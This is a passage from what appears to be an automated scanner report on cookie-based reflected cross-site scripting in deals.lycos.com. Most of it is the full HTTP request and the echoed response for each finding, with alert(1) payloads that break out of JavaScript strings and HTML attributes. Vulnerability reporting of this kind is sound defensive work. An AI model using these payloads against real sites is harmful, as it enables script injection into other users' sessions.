This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4"%3balert(1)//c8dbb3e8531; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/ebay-50",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4";alert(1)//c8dbb3e8531"
});
</script>
...[SNIP]...

1.315. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0001"%3balert(1)//e061132f52f was submitted in the diktfc cookie. This input was echoed as a0001";alert(1)//e061132f52f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001"%3balert(1)//e061132f52f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/itunes-music-store-1414",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001";alert(1)//e061132f52f"
});
</script>
...[SNIP]...

1.316. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef1"><script>alert(1)</script>ba52086b4b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/itunes-music-store-1414&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8&amp;cj=1" alt="tracker" />
...[SNIP]...

1.317. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/jcpenney-320

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f34a"><script>alert(1)</script>05c0ac4a695 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/jcpenney-320&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695&amp;cj=1" alt="tracker" />
...[SNIP]...

1.318. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/jcpenney-320

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfcf4"%3balert(1)//5e595d1d45 was submitted in the diktfc cookie. This input was echoed as cfcf4";alert(1)//5e595d1d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4"%3balert(1)//5e595d1d45; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/jcpenney-320",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4";alert(1)//5e595d1d45"
});
</script>
...[SNIP]...

1.319. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/kohls-1009

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb51"%3balert(1)//dcef7041eb3 was submitted in the diktfc cookie. This input was echoed as 7eb51";alert(1)//dcef7041eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51"%3balert(1)//dcef7041eb3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/kohls-1009",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51";alert(1)//dcef7041eb3"
});
</script>
...[SNIP]...

1.320. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/kohls-1009

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d946"><script>alert(1)</script>30c7b4c6229 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/kohls-1009&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229&amp;cj=1" alt="tracker" />
...[SNIP]...

1.321. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/sony-style-716

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c81"%3balert(1)//0b0bfcb7a69 was submitted in the diktfc cookie. This input was echoed as 34c81";alert(1)//0b0bfcb7a69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81"%3balert(1)//0b0bfcb7a69; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
cript type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/sony-style-716",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81";alert(1)//0b0bfcb7a69"
});
</script>
...[SNIP]...

1.322. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/sony-style-716

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d333"><script>alert(1)</script>bb3b7fe1ad4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/sony-style-716&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.323. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e01"><script>alert(1)</script>b0e1e045cc1 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/walmart-321&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1&amp;cj=1" alt="tracker" />
...[SNIP]...

1.324. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3eb"%3balert(1)//81b4caeacf4 was submitted in the diktfc cookie. This input was echoed as 9d3eb";alert(1)//81b4caeacf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb"%3balert(1)//81b4caeacf4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/walmart-321",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb";alert(1)//81b4caeacf4"
});
</script>
...[SNIP]...

1.325. http://deals.lycos.com/search [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /search

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9bf"%3balert(1)//4aaaae1a092 was submitted in the diktfc cookie. This input was echoed as 7c9bf";alert(1)//4aaaae1a092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

